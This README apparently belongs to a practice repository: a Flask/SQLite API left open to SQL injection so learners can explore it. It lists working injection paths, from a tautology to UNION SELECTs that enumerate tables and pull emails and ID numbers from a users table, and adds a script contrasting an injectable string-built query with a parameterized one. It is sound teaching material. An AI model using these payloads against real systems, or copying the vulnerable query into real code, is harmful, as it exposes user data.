The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).
You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.
You can play with the following endpoints (assuming you're running on localhost):

Endpoint | Description |
---|---|
/challenges/111.111.111-11 | Expected usage |
/challenges/' or '1' = '1 | Vulnerability proof |
/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_% | Breaks server |
/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_% | Queries all tables and fixes broken server |
/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; -- | Use union select to query data from other tables |
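
The table's paths run against a string-built query and a parameterized one, as an added example that is not code from this repository. The schema (`challenges(cpf, title, score)`, `users(cpf, email)`), the sample rows and the function names are assumptions; the two-column `SELECT` is inferred from the UNION paths above.

```python
import sqlite3

def make_db():
    """Constructed in-memory data; the schema and rows are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (cpf TEXT PRIMARY KEY, email TEXT);
        CREATE TABLE challenges (cpf TEXT, title TEXT, score INTEGER);
        INSERT INTO users VALUES ('111.111.111-11', 'alice@example.com'),
                                 ('222.222.222-22', 'bob@example.com');
        INSERT INTO challenges VALUES ('111.111.111-11', 'Challenge A', 10),
                                      ('222.222.222-22', 'Challenge B', 20);
    """)
    return db

def vulnerable_lookup(db, cpf):
    # The path segment is pasted into the SQL text, so a quote in it ends the
    # string literal and the rest is parsed as SQL.
    return db.execute(
        f"SELECT title, score FROM challenges WHERE cpf = '{cpf}'").fetchall()

def safe_lookup(db, cpf):
    # Bound parameter: the whole segment is compared as one value.
    return db.execute(
        "SELECT title, score FROM challenges WHERE cpf = ?", (cpf,)).fetchall()

def run(lookup, cpf):
    """Rows returned, or the SQLite error an unhandled request would raise."""
    try:
        return lookup(make_db(), cpf)
    except sqlite3.Error as exc:
        return f"error: {exc}"

# Path segments after /challenges/, copied from the table above.
PATHS = {
    "expected": "111.111.111-11",
    "proof": "' or '1' = '1",
    "one_column": "' AND '1' = '2' UNION SELECT name FROM sqlite_master "
                  "WHERE type ='table' AND name NOT LIKE 'sqlite_%",
    "two_columns": "' AND '1' = '2' UNION SELECT 'table_name', name FROM "
                   "sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%",
    "other_table": "' AND '1' = '2' UNION SELECT cpf, email FROM users; --",
}

if __name__ == "__main__":
    for label, path in PATHS.items():
        print(f"{label:12} vulnerable={run(vulnerable_lookup, path)}")
        print(f"{'':12} safe      ={run(safe_lookup, path)}")
```

The one-column path errors because both sides of a `UNION` must return the same number of columns, which is why the next row adds the `'table_name'` literal. With the bound parameter, every path except the expected one returns an empty list.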